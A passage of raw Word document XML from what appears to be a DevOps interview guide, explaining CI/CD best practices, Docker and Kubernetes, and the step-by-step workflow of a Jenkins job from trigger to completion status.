    <w:p w14:paraId="1B29F583"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In the case of </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, the code is automatically deployed to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BC6D38"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CI/CD Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6D3E2"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utomate testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that all tests (unit, integration, end-to-end) are automated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB7D70"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Use feature flags</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For Continuous Deployment, feature flags allow you to deploy code to production without making it visible to users until you are ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33380097"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mall, incremental changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Break down work into smaller pieces to make it easier to integrate and test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067B5E9A"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Monitor production</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Continuous monitoring is necessary to quickly detect issues after deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E8E0D5"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CI/CD with Docker and Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12062FA3"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">CI/CD works really well with </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, enabling teams to develop, test, and deploy applications in containerized environments. Docker helps package the application along with its dependencies, and Kubernetes can be used for deploying and managing those containers in production. This combination allows for easy scaling, isolation, and reliability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E350B"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In summary, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a critical component of modern software development that helps ensure software is integrated, tested, and delivered efficiently, continuously improving the quality and speed of the development lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58332EBF" w14:textId="7034298B" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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6C6B6CA7">
          <v:rect id="_x0000_i3596" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B742100" w14:textId="087C9B8E" w:rsidR="002B5B56" w:rsidRPr="00CE4B95" w:rsidRDefault="00B849F5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="892" w:name="_Toc196308372"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will Jenkins' job work? Explain the process</w:t>
      </w:r>
      <w:r w:rsidR="002B5B56" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="892"/>
    </w:p>
    <w:p w14:paraId="3CB93758" w14:textId="1630F30D" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here’s how a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jenkins job</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> works — step-by-step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288D0FC0" w14:textId="77777777" w:rsidR="006C07EF"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9B9FD0E">
          <v:rect id="_x0000_i3597" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1F7FD"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What is Jenkins?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB38A70"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Jenkins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source automation server used to build, test, and deploy applications. It supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Integration (CI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Continuous Delivery (CD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by automating parts of the software development lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D2C93F" w14:textId="77777777" w:rsidR="006C07EF"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F2DC6F2">
          <v:rect id="_x0000_i3598" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="297F5892"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Jenkins Job Workflow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157594FC"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1. Source Code Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE14703"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A developer pushes code to a version control system like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitHub</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GitLab</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Bitbucket</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E122A"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2. Triggering the Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB8118"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Jenkins is configured to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically trigger</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a job when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1054332A" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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 commit is made (webhook or polling SCM).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B83A4" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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 scheduled time is reached (CRON-style scheduling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35D297" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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Manually triggered by a user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCC48B" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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riggered by another Jenkins job (downstream).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CF299"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3. SCM Checkout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A392DA"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Jenkins checks out the code from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using configured Git credentials and branch).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564582AC"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4. Build Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2D348"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Jenkins executes build scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E603FFB" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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For Java: mvn clean install or gradle build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D835D53" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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For Node.js: npm install &amp;&amp; npm run build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039FE42A"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t compiles source code, resolves dependencies, and packages the app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800DCC7"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5. Test Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442276A4"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Unit tests, integration tests, or functional tests are executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792E3BD4"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Example: mvn test, pytest, npm test, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA3470"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6. Static Code Analysis (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7AB9C6"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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SonarQube</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checkstyle</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PMD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be integrated to analyze code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35E254"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7. Artifact Archiving (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5438A507"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f the build is successful, Jenkins archives the artifacts like .jar, .war, .zip, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1FE8B1"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These can be stored in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Artifactory</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nexus</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or locally on Jenkins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E9E67"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8. Deploy (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7F8F91"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Jenkins can deploy to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB35F5A" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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Dev/Test environments</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using scripts or tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Ansible</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5DE9F2" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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roduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if set up for Continuous Deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E4B21E"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9. Notifications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5792147F"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Jenkins can send job results via:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A291FAF" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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Email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B1445B" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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lack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49983159" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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Microsoft Teams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9F873" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF"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elegram, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AD3ACF"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10. Job Completion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5C162"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Job status is marked as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C8B08F" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A1D44" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B17FD7" w14:textId="77777777" w:rsidR="006C07EF" w:rsidRPr="00617E2C" w:rsidRDefault="006C07EF" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
